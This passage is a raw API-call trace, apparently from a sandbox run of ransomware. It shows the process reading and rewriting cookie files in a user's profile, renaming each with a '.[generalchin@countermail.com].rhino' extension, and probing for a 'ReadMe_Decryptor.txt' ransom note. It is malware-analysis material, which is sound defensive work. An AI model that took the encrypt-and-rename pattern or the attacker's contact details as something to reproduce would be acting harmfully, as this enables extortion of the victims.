lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b01e8 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0478 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e8 | out: hHeap=0x6d0000) returned 1 [0088.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20a) returned 0x23b05c0 [0088.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0478 | out: hHeap=0x6d0000) returned 1 [0088.921] WriteFile (in: hFile=0x104, lpBuffer=0x23b05c0*, nNumberOfBytesToWrite=0x20a, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b05c0*, lpNumberOfBytesWritten=0x2cfa04*=0x20a, lpOverlapped=0x0) returned 1 [0088.922] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x20a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.922] CloseHandle (hObject=0x104) returned 1 [0088.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0478 [0088.925] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.144] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x362, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.144] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.144] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.152] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.153] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x242, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x242, lpOverlapped=0x0) returned 1 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.153] GetLastError () returned 0x0 [0089.153] SetLastError (dwErrCode=0x0) [0089.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x242) returned 0x23b0198 [0089.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b03e8 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b04f0 [0089.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03e8 | out: hHeap=0x6d0000) returned 1 [0089.153] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b03e8 [0089.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0678 [0089.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03e8 | out: hHeap=0x6d0000) returned 1 [0089.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b07c0 [0089.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0678 | out: hHeap=0x6d0000) returned 1 [0089.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b09a8 [0089.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b07c0 | out: hHeap=0x6d0000) returned 1 [0089.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0089.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09a8 | out: hHeap=0x6d0000) returned 1 [0089.155] WriteFile (in: hFile=0x104, lpBuffer=0x75ef78*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ef78*, lpNumberOfBytesWritten=0x2cfa04*=0x362, lpOverlapped=0x0) returned 1 [0089.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0089.156] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x362, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.156] CloseHandle (hObject=0x104) returned 1 [0089.157] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.157] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0678 [0089.157] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.157] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0678 | out: hHeap=0x6d0000) returned 1 [0089.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04f0 | out: hHeap=0x6d0000) returned 1 [0089.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.160] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x65 [0089.160] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x185, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.160] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.160] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.162] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.163] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x65, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x65, lpOverlapped=0x0) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.163] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.163] GetLastError () returned 0x0 [0089.163] SetLastError (dwErrCode=0x0) [0089.163] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x65) returned 0x72a920 [0089.163] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00f0 [0089.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01f8 [0089.163] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.164] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.165] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.165] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.165] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.165] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b00f0 [0089.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.165] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x185) returned 0x23b0380 [0089.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.165] WriteFile (in: hFile=0x104, lpBuffer=0x23b0380*, nNumberOfBytesToWrite=0x185, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0380*, lpNumberOfBytesWritten=0x2cfa04*=0x185, lpOverlapped=0x0) returned 1 [0089.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0089.165] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x185, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.165] CloseHandle (hObject=0x104) returned 1 [0089.166] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0380 [0089.167] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.167] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0089.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01f8 | out: hHeap=0x6d0000) returned 1 [0089.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.168] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.168] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.168] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.168] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x52 [0089.169] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x172, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.169] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.169] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.170] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.171] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x52, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x52, lpOverlapped=0x0) returned 1 [0089.171] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.171] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.171] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.171] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.171] GetLastError () returned 0x0 [0089.171] SetLastError (dwErrCode=0x0) [0089.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x52) returned 0x708d18 [0089.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0198 [0089.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02a0 [0089.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.172] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 